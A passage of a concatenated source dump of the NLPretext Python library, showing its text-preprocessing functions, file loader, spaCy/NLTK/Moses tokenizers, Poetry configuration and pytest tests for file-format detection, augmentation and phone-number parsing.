    def run(self, text: str) -> str:
        """
        Apply pipeline to text.

        Parameters
        ----------
        text : string
            text to preprocess

        Returns
        -------
        string
        """
        operations = self.__operations
        if operations == []:
            operations_to_pipe = (
                remove_html_tags,
                remove_mentions,
                remove_emoji,
                remove_hashtag,
                remove_eol_characters,
                fix_bad_unicode,
                normalize_whitespace,
            )
            operations = [
                {"operation": operation, "args": None} for operation in operations_to_pipe
            ]
        self.pipeline = self.build_pipeline(operations)
        text = self.pipeline.transform(text)
        return text


================================================
FILE: nlpretext/py.typed
================================================


================================================
FILE: nlpretext/social/__init__.py
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.


================================================
FILE: nlpretext/social/preprocess.py
================================================
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License


from typing import List, Tuple

import emoji as _emoji
from nlpretext._config import constants
from nlpretext.basic.preprocess import normalize_whitespace


def remove_mentions(text: str) -> str:
    """
    Function that removes words preceded with a '@'.

    Parameters
    ----------
    text : str

    Returns
    -------
    string
    """
    text = normalize_whitespace(constants.AT_PATTERN.sub("", text))
    return text


def extract_mentions(text: str) -> List[str]:
    """
    Function that extracts words preceded with a '@'
    eg. "I take care of my skin with @thisproduct" --> ["@thisproduct"].

    Parameters
    ----------
    text : str

    Returns
    -------
    string
    """
    return constants.AT_PATTERN.findall(text)


def remove_html_tags(text: str) -> str:
    """
    Function that removes words between < and >.

    Parameters
    ----------
    text : str

    Returns
    -------
    string
    """
    text = normalize_whitespace(constants.HTML_TAG_PATTERN.sub("", text))
    return text


def remove_emoji(text: str) -> str:
    """
    Remove emoji from any str by stripping any unicode in the range of Emoji unicode
    as defined in the unicode convention:
    http://www.unicode.org/emoji/charts/full-emoji-list.html.

    Parameters
    ----------
    text : str

    Returns
    -------
    str
    """
    text = _emoji.replace_emoji(text, "")
    return text


# TODO: replace mutable default value :
#  https://docs.quantifiedcode.com/python-anti-patterns/correctness/mutable_default_value_as_argument.html
def convert_emoji_to_text(text: str, code_delimiters: Tuple[str, str] = (":", ":")) -> str:
    """
    Convert emoji to their CLDR Short Name, according to the unicode convention
    http://www.unicode.org/emoji/charts/full-emoji-list.html
    eg. 😀 --> :grinning_face:

    Parameters
    ----------
    text : str
    code_delimiters : tuple of symbols around the emoji code.
    eg: (':',':') --> :grinning_face:

    Returns
    -------
    str
        string
    """
    return _emoji.demojize(text, delimiters=code_delimiters)


def extract_emojis(text: str) -> List[str]:
    """
    Function that extracts emojis from a text and translates them into words
    eg. "I take care of my skin 😀 :(" --> [":grinning_face:"].

    Parameters
    ----------
    text : str

    Returns
    -------
    list
        list of all emojis converted with their unicode conventions
    """
    emojis_in_text = _emoji.emoji_list(text)
    emojis_converted = [
        convert_emoji_to_text(emoji_text.get("emoji", "")) for emoji_text in emojis_in_text
    ]
    return emojis_converted


def extract_hashtags(text: str) -> List[str]:
    """
    Function that extracts words preceded with a '#'
    eg. "I take care of my skin #selfcare#selfestim" --> ["skincare", "selfestim"].

    Parameters
    ----------
    text : str

    Returns
    -------
    list
        list of all hashtags
    """
    return constants.HASHTAG_PATTERN.findall(text)


def remove_hashtag(text: str) -> str:
    """
    Function that removes words preceded with a '#'
    eg. "I take care of my skin #selfcare#selfestim" --> "I take care of my skin".

    Parameters
    ----------
    text : str

    Returns
    -------
    str
        text of a post without hashtags
    """
    text = normalize_whitespace(constants.HASHTAG_PATTERN.sub("", text))
    return text


================================================
FILE: nlpretext/textloader.py
================================================
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
from types import ModuleType
from typing import Any, List, Optional, Union

import sys
import warnings

import pandas as pd

try:
    from nlpretext._utils import daskloader
except ImportError:
    warnings.warn(
        "Dask not found, switching to pandas. To be able to use Dask, run : pip install nlpretext[dask]",  # noqa: E501
        stacklevel=2,
    )

from nlpretext._utils import pandasloader
from nlpretext._utils.file_loader import check_text_file_format
from nlpretext.preprocessor import Preprocessor


class TextLoader:
    def __init__(self, text_column="text", encoding="utf-8", file_format=None, use_dask=True):
        """
        Initialize DataLoader object to retrieve text data.

        Parameters
        ----------
        text_column: string
            name of the column containing texts in json / csv / parquet files
        encoding: string
            encoding of the text to be loaded, can be utf-8 or latin-1 for example
        file_format: string | None
            format of the files to be loaded
        use_dask: bool
            use dask to load text
        """
        self.text_column = text_column
        self.encoding = encoding
        self.file_format = file_format

        self.use_dask = use_dask

        self.loader: ModuleType
        if self.use_dask:
            if "dask" in sys.modules:
                self.loader = daskloader
            else:
                warnings.warn(
                    "Dask is not intalled, switching to pandas. Run pip install dask to use dask",
                    stacklevel=2,
                )
                self.use_dask = False
                self.loader = pandasloader
        else:
            self.loader = pandasloader

    def __repr__(self):
        """Method to represent class attributes."""
        class_repr_dict = {
            "text_column": self.text_column,
            "encoding": self.encoding,
            "file_format": self.file_format,
            "use_dask": self.use_dask,
        }
        return f"TextLoader({class_repr_dict})"

    def _read_text_txt(self, files_path):
        """
        Read txt text files stored in files_path.

        Parameters
        ----------
        files_path : string | list[string]
            single or multiple files path

        Returns
        -------
        dask.dataframe | pandas.DataFrame
        """
        text_ddf = self.loader.read_text(files_path, encoding=self.encoding)
        text_ddf.columns = [self.text_column]
        return text_ddf

    def _read_text_json(self, files_path):
        """
        Read json text files stored in files_path.

        Parameters
        ----------
        files_path : string | list[string]
            single or multiple files path

        Returns
        -------
        dask.dataframe | pandas.DataFrame
        """
        text_ddf = self.loader.read_json(files_path, encoding=self.encoding)
        try:
            return text_ddf[[self.text_column]]
        except KeyError as e:
            raise KeyError(f"Specified text_column '{self.text_column}' not in file keys") from e

    def _read_text_csv(self, files_path):
        """
        Read csv text files stored in files_path.

        Parameters
        ----------
        files_path : string | list[string]
            single or multiple files path

        Returns
        -------
        dask.dataframe | pandas.DataFrame
        """
        text_ddf = self.loader.read_csv(files_path, encoding=self.encoding)
        try:
            return text_ddf[[self.text_column]]
        except KeyError as e:
            raise KeyError(f"Specified text_column '{self.text_column}' not in file keys") from e

    def _read_text_parquet(self, files_path):
        """
        Read parquet text files stored in files_path.

        Parameters
        ----------
        files_path : string | list[string]
            single or multiple files path

        Returns
        -------
        dask.dataframe | pandas.DataFrame
        """
        text_ddf = self.loader.read_parquet(files_path, encoding=self.encoding)
        try:
            return text_ddf[[self.text_column]]
        except KeyError as e:
            raise KeyError(f"Specified text_column '{self.text_column}' not in file keys") from e

    def read_text(
        self,
        files_path: Union[str, List[str]],
        file_format: Optional[str] = None,
        encoding: Optional[str] = None,
        compute_to_pandas: bool = True,
        preprocessor: Optional[Preprocessor] = None,
    ) -> Union[pd.DataFrame, Any]:
        """
        Read the text files stored in files_path.

        Parameters
        ----------
        files_path: string | list[string]
            single or multiple files path
        file_format: string
            Format of the files to be loaded, to be selected among csv, json, parquet or txt
        encoding:
            encoding of the text to be loaded, can be utf-8 or latin-1 for example
        compute_to_pandas: bool
            True if user wants Dask Dataframe to be computed as pandas DF, False otherwise
        preprocessor: nlpretext.preprocessor.Preprocessor
            NLPretext preprocessor can be specified to pre-process text after loading

        Returns
        -------
        dask.dataframe | pandas.DataFrame
        """
        if encoding is not None:
            self.encoding = encoding

        if file_format is not None:
            self.file_format = file_format
        else:
            self.file_format = check_text_file_format(files_path)

        reader_mapping = {
            "csv": self._read_text_csv,
            "txt": self._read_text_txt,
            "json": self._read_text_json,
            "parquet": self._read_text_parquet,
        }
        reader = reader_mapping.get(self.file_format)
        if reader is None:
            raise ValueError("Format not handled")
        text = reader(files_path)

        if preprocessor is not None:
            if isinstance(preprocessor, Preprocessor):
                print(f"before: {text.head()}")
                text[self.text_column] = text[self.text_column].apply(preprocessor.run)
                print(f"after: {text.head()}")
            else:
                raise ValueError("Only NLPretext preprocessors can be specified")

        if compute_to_pandas and self.use_dask:
            return text.compute()
        return text


================================================
FILE: nlpretext/token/__init__.py
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.


================================================
FILE: nlpretext/token/preprocess.py
================================================
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License


from typing import List, Optional

import re

from nlpretext._utils.stopwords import get_stopwords


def remove_stopwords(
    tokens: List[str], lang: str, custom_stopwords: Optional[List[str]] = None
) -> List[str]:
    """
    Remove stopwords from a text.
    eg. 'I like when you move your body !' -> 'I move body !'.

    Parameters
    ----------
    tokens: list(str)
        list of tokens
    lang: str
        language iso code (e.g : "en")
    custom_stopwords : list(str)|None
        list of custom stopwords to add. None by default

    Returns
    -------
    list
        tokens without stopwords

    Raises
    ------
    ValueError
        When inputs is not a list
    """
    stopwords = get_stopwords(lang)
    if custom_stopwords:
        stopwords += custom_stopwords
    tokens = [word for word in tokens if word not in stopwords]
    return tokens


def remove_tokens_with_nonletters(tokens: List[str]) -> List[str]:
    """
    Inputs a list of tokens, outputs a list of tokens without tokens that
    includes numbers of special caracters.
    ['foo','bar','124','34euros'] -> ['foo','bar'].

    Parameters
    ----------
    tokens : list
        list of tokens to be cleaned

    Returns
    -------
    list
        list of tokens without tokens with numbers
    """
    tokens = [word for word in tokens if re.search("[^a-zA-Z]", word) is None]
    return tokens


def remove_special_caracters_from_tokenslist(tokens: List[str]) -> List[str]:
    """
    Remove tokens that doesn't contains any number or letter.
    eg. ['foo','bar','---',"'s",'#'] -> ['foo','bar',"'s"].

    Parameters
    ----------
    tokens : list
        list of tokens to be cleaned

    Returns
    -------
    list
        list of tokens without tokens that contains only special caracters

    """
    tokens = [word for word in tokens if re.search("[a-zA-Z0-9]", word)]
    return tokens


def remove_smallwords(tokens: List[str], smallwords_threshold: int) -> List[str]:
    """
    Function that removes words which length is below a threshold
    ["hello", "my", "name", "is", "John", "Doe"] --> ["hello","name","John","Doe"].

    Parameters
    ----------
    text : list
        list of strings
    smallwords_threshold: int
        threshold of small word

    Returns
    -------
    list
    """
    tokens = [word for word in tokens if len(word) > smallwords_threshold]
    return tokens


================================================
FILE: nlpretext/token/tokenizer.py
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
# mypy: disable-error-code="assignment"

from typing import Any, List, Optional, Union

import os
import re

import nltk
import spacy
from sacremoses import MosesDetokenizer, MosesTokenizer

MODEL_REGEX = re.compile(r"^[a-z]{2}_(?:core|dep|ent|sent)_(?:web|news|wiki|ud)_(?:sm|md|lg|trf)$")
SUPPORTED_LANG_MODULES = {"en_spacy", "en_nltk", "fr_spacy", "fr_moses", "ko_spacy", "ja_spacy"}


class LanguageNotHandled(Exception):
    pass


class LanguageNotInstalledError(Exception):
    pass


class SpacyModel:
    class SingletonSpacyModel:
        def __init__(self, lang: str) -> None:
            self.lang = lang
            if lang == "en":
                self.model = _load_spacy_model("en_core_web_sm")
            elif lang == "fr":
                self.model = _load_spacy_model("fr_core_news_sm")
            elif lang == "ko":
                self.model = spacy.blank("ko")
            elif lang == "ja":
                self.model = spacy.blank("ja")
            else:
                raise (LanguageNotHandled("This spacy model is not available"))

    model: Optional[spacy.language.Language] = None

    def __init__(self, lang):
        if not SpacyModel.model:
            SpacyModel.model = SpacyModel.SingletonSpacyModel(lang).model

    def get_lang_model(self) -> Optional[str]:  # noqa: D102
        if self.model:
            lang: str = self.model.lang
            return lang
        return None


def _load_spacy_model(model: str) -> Any:
    try:
        return spacy.load(model)
    except OSError as e:
        if MODEL_REGEX.match(model):
            os.system(f"python -m spacy download {model}")  # nosec
            return spacy.load(model)
        else:
            raise LanguageNotInstalledError(
                f"Model {model} is not installed. "
                f"To install, run: python -m spacy download {model}"
            ) from e


def _get_spacy_tokenizer(lang: str) -> Optional[spacy.tokenizer.Tokenizer]:
    """
    Function that gets the right tokenizer given the language.

    Parameters
    ----------
    lang : str
        Language in which text is written. Languages handled : ["en", "fr", "ko", "ja"]

    Returns
    -------
    spacy.tokenizer.Tokenizer
        spacy tokenizer
    """
    model = SpacyModel(lang).model
    if model:
        return model.tokenizer
    return None


def tokenize(text: str, lang_module: str = "en_spacy") -> List[str]:
    """
    Convert text to a list of tokens.

    Parameters
    ----------
    lang_module : str {'en_spacy', 'en_nltk', 'fr_spacy', 'fr_moses', 'ko_spacy', 'ja_spacy'}
        choose the tokenization module according to the langage and the implementation.
        Recommanded: Spacy (faster, better results). To process other langages
        import models.Spacy_models

    Returns
    -------
    list
        list of string

    Raises
    ------
    ValueError
        If lang_module is not a valid module name
    """
    if lang_module not in SUPPORTED_LANG_MODULES:
        raise ValueError(
            f"Invalid lang_module: {lang_module}. "
            f"lang_module must be one of {SUPPORTED_LANG_MODULES}."
        )

    tokenized_words: List[str] = []
    if "spacy" in lang_module:
        lang = lang_module.split("_")[0]
        spacymodel = _get_spacy_tokenizer(lang)
        if spacymodel:
            spacydoc = spacymodel(text)
            tokenized_words = [spacy_token.text for spacy_token in spacydoc]
    if lang_module == "en_nltk":
        tokenized_words = nltk.word_tokenize(text)
    if lang_module == "fr_moses":
        tokenized_words = MosesTokenizer(lang="fr").tokenize(text, escape=False)

    return tokenized_words


def untokenize(tokens: List[str], lang: str = "fr") -> str:
    """
    Inputs a list of tokens output string.
    ["J'", 'ai'] >>> "J' ai".

    Parameters
    ----------
    lang : string
        language code

    Returns
    -------
    string
        text
    """
    d = MosesDetokenizer(lang=lang)
    text: str = d.detokenize(tokens, unescape=False)
    return text


def convert_tokens_to_string(tokens_or_str: Optional[Union[str, List[str]]]) -> str:  # noqa: D103
    if isinstance(tokens_or_str, str):
        return tokens_or_str
    if isinstance(tokens_or_str, list):
        return untokenize(tokens_or_str)
    if tokens_or_str is None:
        return ""
    raise TypeError("Please input string or tokens")


def convert_string_to_tokens(  # noqa: D103
    tokens_or_str: Optional[Union[str, List[str]]], lang_module: str = "en_spacy"
) -> List[str]:
    if isinstance(tokens_or_str, str):
        return tokenize(tokens_or_str, lang_module=lang_module)
    if isinstance(tokens_or_str, list):
        return tokens_or_str
    if tokens_or_str is None:
        return []
    raise TypeError("Please input string or tokens")


================================================
FILE: pyproject.toml
================================================
# Poetry pyproject.toml: https://python-poetry.org/docs/pyproject/

[build-system]
requires = ["poetry_core>=1.0.0"]
build-backend = "poetry.core.masonry.api"

[tool.poetry]
name = "nlpretext"
version = "1.2.2"
description = "All the goto functions you need to handle NLP use-cases, integrated in NLPretext"
readme = "README.md"
authors = [
  "artefactory <rafaelle.aygalenq@artefact.com>"
]
license = "Apache Software License 2.0"
repository = "https://github.com/artefactory/NLPretext"
homepage = "https://github.com/artefactory/NLPretext"

# Keywords description https://python-poetry.org/docs/pyproject/#keywords
keywords = []  # Update me

# Pypi classifiers: https://pypi.org/classifiers/
classifiers = [  # Update me
  "Development Status :: 3 - Alpha",
  "Intended Audience :: Developers",
  "Operating System :: OS Independent",
  "Topic :: Software Development :: Libraries :: Python Modules",
]

[tool.poetry.scripts]
# Entry points for the package https://python-poetry.org/docs/pyproject/#scripts
"nlpretext" = "nlpretext.cli.__main__:app"

[tool.poetry.dependencies]
python = ">=3.8,<3.11"
typer = {extras = ["all"], version = ">=0.3.2"}
rich = ">=10.1"
chardet = ">=3.0.4"
emoji = ">=2.0.0"
flashtext = ">=2.7"
ftfy = ">=4.2.0"
mosestokenizer = ">=1.1.0"
nlpaug = ">=1.0.1"
nltk = ">=3.4.2"
numpy = "^1.22"
phonenumbers = ">=8.10.12"
regex = ">=2019.8.19"
sacremoses = ">=0.0.13"
scikit-learn = ">=0.23.2, <2"
spacy = ">=3.0.5"
pillow = ">=8.2.1"
thinc = ">=8.0.4"
stop-words = ">=2018.7.23"
pandas = ">=1.3,<3.0"
pyarrow = ">=4.0.0"
fastparquet = ">=0.4.1"
dask = {version = ">=2021.5.0", extras = ["complete"], optional = true}
distributed = {version = ">=2021.5.0", extras = ["complete"], optional = true}
tornado = ">=6.0.3"
torch = {version = "^1.9.0", optional = true}

[tool.poetry.group.dev.dependencies]
isort = ">=5.8.0"
pyupgrade = ">=2.12.0"
black = ">=20.8b1"
ruff = "^0.1.5"
mypy = ">=0.812"
bandit = ">=1.7.0"
safety = ">=1.10.3"
pytest = ">=6.2.1"
pytest-cov = ">=2.10.1"
coverage = ">=5.3"
pre-commit = ">=2.12.0"
mypy-extensions = ">=0.4.3"
types-emoji = ">=1.2.2"
types-chardet = ">=0.1.3"
types-click = ">=7.1.2"


[tool.poetry.group.docs.dependencies]
nbsphinx = ">=0.8.0"
notebook = ">=6.1.5"
Pygments = ">=2.8.0"
recommonmark=">=0.7.1"
Sphinx = ">=3.5.4"
sphinx-gallery = ">=0.8.1"
sphinxcontrib-applehelp = ">=1.0.2"
sphinxcontrib-devhelp = ">=1.0.2"
sphinxcontrib-htmlhelp = ">=1.0.3"
sphinxcontrib-jsmath = ">=1.0.1"
sphinxcontrib-qthelp = ">=1.0.3"
sphinxcontrib-serializinghtml = ">=1.1.4"
sphinx-autodoc-typehints = ">=1.11.1"
sphinx_rtd_theme = ">=0.5.2"
sphinx-multiversion-pre-post-build = ">=0.2.4"


[tool.poetry.extras]
torch = ["torch"]
dask = ["dask", "distributed"]

[tool.black]
# https://github.com/psf/black
line-length = 100
target-version = ["py38"]

[tool.isort]
# https://github.com/timothycrosley/isort/
profile = "black"
known_typing = "typing,types,typing_extensions,mypy,mypy_extensions"
sections = "FUTURE,TYPING,STDLIB,THIRDPARTY,FIRSTPARTY,LOCALFOLDER"
default_section = "FIRSTPARTY"
force_grid_wrap = 0
line_length = 100


[tool.ruff]
ignore = [
    "D100",
    "D101",
    "D106",
    "D205",
    "D400",
    "D415",
    "D401",
]
line-length = 100
select = ["B", "C", "D", "E", "F", "W"]

[tool.ruff.pydocstyle]
convention = "numpy"

[tool.ruff.per-file-ignores]
"*cli.py" = ["D", "B008"]
"*__init__.py" = [
    "F401",
    "D100",
    "D101",
    "D103",
    "D104",
    "D105",
    "D106",
    "D107",
]
"tests/*" = ["D", "E501"]


================================================
FILE: references/.gitkeep
================================================


================================================
FILE: tests/__init__.py
================================================


================================================
FILE: tests/test_data_augmentation.py
================================================
import pytest
from nlpretext.augmentation.text_augmentation import (
    CouldNotAugment,
    UnavailableAugmenter,
    get_augmenter,
    process_entities_and_text,
)


@pytest.mark.parametrize(
    "text, text_augmented, entities, expected",
    [
        (
            "I want to buy a small black handbag.",
            "I want to acquire a small black handbag",
            [
                {"entity": "Size", "word": "small", "startCharIndex": 16, "endCharIndex": 21},
                {"entity": "Color", "word": "black", "startCharIndex": 22, "endCharIndex": 27},
                {"entity": "Type", "word": "handbag", "startCharIndex": 28, "endCharIndex": 35},
            ],
            {"type": str, "entities": ["black", "handbag", "small"]},
        ),
        (
            "I want to buy a small black handbag.",
            "I would like to buy a black small handbag",
            [
                {"entity": "Size", "word": "small", "startCharIndex": 16, "endCharIndex": 21},
                {"entity": "Color", "word": "black", "startCharIndex": 22, "endCharIndex": 27},
                {"entity": "Type", "word": "handbag", "startCharIndex": 28, "endCharIndex": 35},
            ],
            {"type": str, "entities": ["black", "handbag", "small"]},
        ),
    ],
)
def test_process_entities_and_text_not_altered(text, text_augmented, entities, expected):
    augmented_text, augmented_entities = process_entities_and_text(entities, text, text_augmented)
    augmented_entities = sorted(el["word"] for el in augmented_entities)
    assert {"type": type(augmented_text), "entities": augmented_entities} == expected


@pytest.mark.parametrize(
    "text, text_augmented, entities",
    [
        (
            "I live in New York and I am looking for a lipstick",
            "I live in New and York I an looking for a lipstick",
            [
                {"entity": "City", "word": "New York", "startCharIndex": 10, "endCharIndex": 18},
                {"entity": "Type", "word": "bag", "startCharIndex": 42, "endCharIndex": 50},
            ],
        )
    ],
)
def test_process_entities_and_text_altered(text, text_augmented, entities):
    with pytest.raises(CouldNotAugment) as excinfo:
        process_entities_and_text(entities, text, text_augmented)
        assert (
            str(excinfo.value) == "Text was not correctly augmented because entities were altered"
        )


def test_get_augmenter():
    method = "ppdb_synonym"
    with pytest.raises(UnavailableAugmenter) as excinfo:
        get_augmenter(method)
        assert (
            str(excinfo.value)
            == "The given augmenter is not supported. You must choose one \
               of the following: wordnet_synonym or aug_sub_bert"
        )


================================================
FILE: tests/test_file_loader.py
================================================
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License

import os
import re

import numpy as np
import pytest
from nlpretext._utils.file_loader import check_text_file_format, detect_encoding

TESTDOC_LATIN1 = "J'aime les frites bien grasse étalon châpeau!"
TESTDOC_UTF8 = "Un deuxième exemple de texte en utf-8 cette fois!"


def create_files():
    encoded_s = TESTDOC_LATIN1.encode("latin-1")
    with open("testdoc_latin1.txt", "wb") as f:
        f.write(encoded_s)

    encoded_s = TESTDOC_UTF8.encode("utf-8")
    with open("testdoc_utf8.txt", "wb") as f:
        f.write(encoded_s)
    return True


def test_detect_encoding():
    create_files()
    expected = {"encoding": "ISO-8859-1", "confidence": 0.73, "language": ""}
    result = detect_encoding("testdoc_latin1.txt")
    np.testing.assert_equal(result, expected)
    remove_files()


def remove_files():
    os.remove("testdoc_latin1.txt")
    os.remove("testdoc_utf8.txt")


@pytest.mark.parametrize(
    "input_filepath, raising, expected_str",
    [
        ("hello.csv", False, "csv"),
        ("folder/hello.csv", False, "csv"),
        ("gs://folder/hello.csv", False, "csv"),
        ("s3://folder/hello.csv", False, "csv"),
        ("hdfs://folder/hello.csv", False, "csv"),
        ("az://folder/hello.csv", False, "csv"),
        ("wildcards/*.csv", False, "csv"),
        ("compressed/gz/text.csv.gz", False, "csv"),
        ("compressed/zip/text.csv.zip", False, "csv"),
        (["hello.csv"], False, "csv"),
        (["hello.csv", "compressed.csv.gz"], False, "csv"),
        (["hello.csv", "other/folder/hello.csv"], False, "csv"),
        ("hello.json", False, "json"),
        ("folder/hello.json", False, "json"),
        ("gs://folder/hello.json", False, "json"),
        (["hello.json", "folder/hello.json"], False, "json"),
        ("hello.txt", False, "txt"),
        ("folder/hello.txt", False, "txt"),
        ("gs://folder/hello.txt", False, "txt"),
        (["hello.txt", "gs://folder/hello.txt"], False, "txt"),
        ("hello.parquet", False, "parquet"),
        ("folder/hello.parquet", False, "parquet"),
        ("gs://folder/hello.parquet", False, "parquet"),
        (["hello.parquet", "gs://folder/hello.parquet"], False, "parquet"),
        (
            "gs://folder/hello.notaformat",
            True,
            "Unrecognized format among specified files, only .csv, .json, .parquet and .txt accepted",
        ),
        (
            "gs://folder/hello.gz",
            True,
            "Unrecognized format among specified files, only .csv, .json, .parquet and .txt accepted",
        ),
        (
            "gs://folder/hello.zip",
            True,
            "Unrecognized format among specified files, only .csv, .json, .parquet and .txt accepted",
        ),
        (
            "folder/*",
            True,
            "Unrecognized format among specified files, only .csv, .json, .parquet and .txt accepted",
        ),
        (
            ["hello.txt", "gs://folder/hello.csv"],
            True,
            re.escape("Multiple file formats found in file path list: ['txt', 'csv']"),
        ),
    ],
)
def test_check_text_file_format(input_filepath, raising, expected_str):
    if raising:
        with pytest.raises(ValueError, match=expected_str):
            check_text_file_format(input_filepath)
    else:
        result = check_text_file_format(input_filepath)
        assert result == expected_str


================================================
FILE: tests/test_phone_number.py
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
import nlpretext._utils.phone_number as phone
from nlpretext._config.config import SUPPORTED_COUNTRY


def test_extract_phone_number():
    input_str = "(541) 754-3010 is a US. Phone"
    expected = ["(541) 754-3010", "754-3010"]
    res = phone.extract_phone_numbers(input_str, countrylist=SUPPORTED_COUNTRY)
    assert sorted(res) == sorted(expected)


def test_extract_phone_number_us():
    input_str = "(541) 754-3010 is a US. Phone"
    expected = ["(541) 754-3010"]
    res = phone.extract_phone_numbers(input_str, countrylist=["US"])
    assert res == expected


def test_extract_phone_number_fr():
    input_str = "06.00.00.00.00 is a FR Phone"
    expected = ["06.00.00.00.00"]
    res = phone.extract_phone_numbers(input_str, countrylist=["FR"])
    assert res == expected


def test_extract_phone_number_international():
    input_str = "+33600000000 is an international Phone number"
    expected = ["+33600000000"]
    res = phone.extract_phone_numbers(input_str, countrylist=["US", "GB", "FR", None])
    assert res == expected


def test_phone_parser_us():
    input_str = "(541) 754-3010"
    expected = "+1 541-754-3010"
    p = phone.PhoneParser()
    p.parse_number(input_str, region_code="US")
    res = p.format_number("INTERNATIONAL")
    assert res == expected


def test_phone_parser_fr():
    input_str = "0600000000"
    expected = "+33600000000"
    p = phone.PhoneParser()
    p.parse_number(input_str, region_code="FR")
    res = p.format_number("E164")
    assert res == expected


================================================
FILE: tests/test_preprocessor.py
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.


import numpy as np
import pytest
from nlpretext._config.config import SUPPORTED_COUNTRY
from nlpretext._utils.stopwords import get_stopwords
from nlpretext.basic.preprocess import (
    filter_non_latin_characters,
    fix_bad_unicode,
    normalize_whitespace,
    remove_accents,
    remove_eol_characters,
    remove_multiple_spaces_and_strip_text,
    remove_punct,
)
from nlpretext.basic.preprocess import remove_stopwords as remove_stopwords_text
from nlpretext.basic.preprocess import (
    replace_currency_symbols,
    replace_emails,
    replace_numbers,
    replace_phone_numbers,
    replace_urls,
    unpack_english_contractions,
)
from nlpretext.preprocessor import Preprocessor
from nlpretext.social.preprocess import (
    convert_emoji_to_text,
    extract_emojis,
    extract_hashtags,
    extract_mentions,
    remove_emoji,
    remove_hashtag,
    remove_html_tags,
    remove_mentions,
)
from nlpretext.token.preprocess import remove_smallwords, remove_special_caracters_from_tokenslist
from nlpretext.token.preprocess import remove_stopwords as remove_stopwords_token
from nlpretext.token.preprocess import remove_tokens_with_nonletters


@pytest.mark.parametrize(
    "text, expected_result",
    [
